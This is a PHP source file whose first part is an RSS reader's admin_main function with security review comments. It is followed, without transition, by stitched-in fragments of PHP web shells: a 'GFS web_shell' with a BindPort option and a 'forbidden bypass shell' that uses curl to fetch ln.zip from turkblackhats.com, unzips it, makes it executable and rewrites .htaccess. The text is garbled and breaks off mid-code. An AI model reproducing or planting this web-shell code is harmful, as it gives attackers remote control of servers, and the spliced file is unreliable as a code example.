/**
 * Entry point of the administration interface.
 *
 * Opens the "channel_admin" frame, then either renders the admin area
 * (menu, optional action handler, selected view) or prints the
 * "Not Authorized" error, and finally closes the frame.
 *
 * Security notes for maintainers:
 *  - The authorisation decision is made by the caller; this function only
 *    branches on the boolean it is handed. Nothing below re-checks it.
 *  - Both the action (CST_ADMIN_DOMAIN) and the view (CST_ADMIN_VIEW) are
 *    read from $_REQUEST, so they can arrive via GET as well as POST (and
 *    via cookies, depending on the request_order / variables_order ini
 *    settings).
 *  - NOTE(review): no anti-CSRF token is verified in this function. The
 *    *_admin() handlers are invoked before any view is drawn; confirm that
 *    each of them validates a token before changing state.
 *  - The two switch statements compare the request value against fixed
 *    constants (loose comparison) and do nothing on a miss, so unknown
 *    values never reach a handler or a renderer.
 *
 * @param mixed $authorised truthy when the caller has established that the
 *                          current user may use the admin interface
 */
function admin_main($authorised) {
    echo "\n<div id=\"channel_admin\" class=\"frame\">";

    // Unauthorised callers get the error message and nothing else.
    if (!$authorised) {
        // NOTE(review): getPath() is placed into the href unescaped -
        // presumably a server-side value; confirm it cannot carry request data.
        $notice = sprintf(__('<h1>Not Authorized!</h1>You are not authorized to access the administration interface. 
Please follow <a href="%s">this link</a> back to the main page. Have a nice day!'), getPath());
        rss_error($notice, RSS_ERROR_ERROR, true);
        echo "</div>\n";
        return;
    }

    admin_menu();

    // Step 1: run the action handler named by the request, if any. Its
    // return value (when set) decides which view is rendered in step 2.
    if (array_key_exists(CST_ADMIN_DOMAIN, $_REQUEST)) {
        switch ($_REQUEST[CST_ADMIN_DOMAIN]) {
            case CST_ADMIN_DOMAIN_FOLDER:
                $view = folder_admin();
                break;
            case CST_ADMIN_DOMAIN_CHANNEL:
                $view = channel_admin();
                break;
            case CST_ADMIN_DOMAIN_CONFIG:
                $view = config_admin();
                break;
            case CST_ADMIN_DOMAIN_ITEM:
                $view = item_admin();
                break;
            case CST_ADMIN_DOMAIN_PLUGINS:
                $view = plugins_admin();
                break;
            case CST_ADMIN_DOMAIN_THEMES:
                $view = themes_admin();
                break;
            case CST_ADMIN_DOMAIN_TAGS:
                $view = tags_admin();
                break;
            case CST_ADMIN_DOMAIN_PLUGIN_OPTIONS:
                $view = plugin_options_admin();
                break;
            case CST_ADMIN_DOMAIN_THEME_OPTIONS:
                $view = theme_options_admin();
                break;
            default:
                // Unknown action: no handler runs.
                break;
        }
    }

    // Step 2: render a view. A view chosen by the handler wins over the
    // one named in the request; with neither, fall back to the configured
    // landing page.
    $viewRequested = array_key_exists(CST_ADMIN_VIEW, $_REQUEST);
    if ($viewRequested || isset($view)) {
        if (!isset($view)) {
            $view = $_REQUEST[CST_ADMIN_VIEW];
        }
        switch ($view) {
            case CST_ADMIN_DOMAIN_CONFIG:
                config();
                break;
            case CST_ADMIN_DOMAIN_CHANNEL:
                channels();
                break;
            case CST_ADMIN_DOMAIN_FOLDER:
                folders();
                break;
            case CST_ADMIN_DOMAIN_OPML:
                opml();
                break;
            case CST_ADMIN_DOMAIN_NONE:
                // Explicitly render nothing.
                break;
            case CST_ADMIN_DOMAIN_ITEM:
                items();
                break;
            case CST_ADMIN_DOMAIN_SYSINFO:
                sysinfo();
                break;
            case CST_ADMIN_DOMAIN_DASHBOARD:
                dashboard();
                break;
            case CST_ADMIN_DOMAIN_PLUGINS:
                plugins();
                break;
            case CST_ADMIN_DOMAIN_THEMES:
                themes();
                break;
            case CST_ADMIN_DOMAIN_TAGS:
                tags();
                break;
            case CST_ADMIN_DOMAIN_PLUGIN_OPTIONS:
                plugin_options();
                break;
            case CST_ADMIN_DOMAIN_THEME_OPTIONS:
                theme_options();
                break;
            default:
                // Unknown view: render nothing.
        }
    } else {
        $landOnDashboard = (true == getConfig('rss.config.defaultdashboard'));
        if ($landOnDashboard) {
            dashboard();
        } else {
            channels();
        }
    }

    echo "\n<div class=\"clearer\"></div>\n";
    echo "</div>\n";
}
mysql_close($conn_id); } } echo "</table>"; } } } //////////////////////////////////////////////////////////////////////////////// ///////////////////////////////// КОД ////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// echo $HTML; echo "<font face=Verdana size=2 color=blue><b>"; echo rep_char(" ", 15); echo "GFS web_shell ver 3.1.7 </b></font>"; echo "<hr size=3 color=black>"; sysinfo(); echo "<form action=\"" . $HTTP_REFERER . "\" method=\"POST\" enctype=\"multipart/form-data\">"; echo "<table BORDER=1 align=center>"; if ($r_act == "nav" or $r_act == NULL) { echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>"; } else { echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>"; } if (!$safe_mode) { if ($r_act == "bind") { echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>"; } else { echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>"; } } if (function_exists(fsockopen)) {
$a = 65; $b = 90; } if ($part == 3) { $a = 97; $b = 122; } $code_part = chr(rand($a, $b)); @($newcode_length = $newcode_length + 1); @($newcode = $newcode . $code_part); } return $newcode; } # PHP Variables :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: PHP Variables # echo "<CENTER>\n <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse; border-style: solid; border-color: #C0C0C0; padding-left: 4; padding-right: 4; padding-top: 1; padding-bottom: 1' bordercolor='#111111' width='86%' bgcolor='#E0E0E0'>\n <tr>\n <td bgcolor='#AA0000' class='td'><div align='center' class='style4'>: www.islam-hack.com forbidden bypass shell : </div></td>\n </tr>\n <tr>\n <td style='padding:5px 5px 5px 5px '>"; echo sysinfo(); echo "\t </td>\n </tr>\n <tr>\n <td bgcolor='#AA0000' class='td' style='padding:0px 0px 0px 5px'><div align='center' class='style4'>\n <div align='left'>\n <form name='form4' method='post' action=''>\n View Directory : \n <input name='GoDir' type='text' class='DIR' id='GoDir' size='120'>\n </form>\n </div>\n </div></td>\n </tr>\n <tr>\n <td width='100%' height='280' style='padding:20px 20px 20px 20px '>"; if (isset($_POST['Submit2'])) { @mkdir("bomba"); @chdir("bomba"); @exec('curl http://turkblackhats.com/priv/ln.zip -o ln.zip'); @exec('unzip ln.zip'); @exec('chmod 755 ln'); echo '<font color=green>[+] Directory [ bomba ] Created .</font><Br>'; echo '<font color=green>[+] Directory Changed .</font><Br>'; $file3 = 'Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php'; $fp3 = fopen('.htaccess', 'w'); $fw3 = fwrite($fp3, $file3);